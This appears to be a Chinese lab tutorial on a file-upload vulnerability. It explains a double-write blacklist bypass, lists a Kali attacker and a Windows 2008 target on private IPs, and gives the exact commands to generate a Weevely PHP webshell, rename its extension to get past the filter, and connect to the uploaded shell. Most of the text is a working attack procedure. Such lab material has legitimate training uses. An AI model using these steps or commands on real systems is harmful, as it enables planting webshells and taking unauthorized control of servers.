目录
一、相关知识
1、双写绕过原理:
代码编写过程中,只对黑名单中的内容进行空替换,因为只替换一次所以造成双写绕过。
二、环境搭配
攻击机: | kali | IP: | 192.168.0.112 |
靶机: | Windows2008 | IP: | 192.168.0.130:9006 |
三、文件上传
1、创建webshell
格式:weevely generate 密码 文件的保存路径 文件名
命令:weevely generate cmd /home/kali/网络安全/木马/weevely.php
2、修改文件名
在原来文件名后面添加hpp
3、文件上传
右键点击图片使用新标签打开图片,可以发现图片上传的路径。
将hpp改为php
四、Weevely连接
添加数据:将图片路径复制到URL地址,设置密码(文件中的cmd),成功连接。
格式:weevely 文件的URL 密码
命令:weevely http://192.168.0.130:9006/upload/weevely.php cmd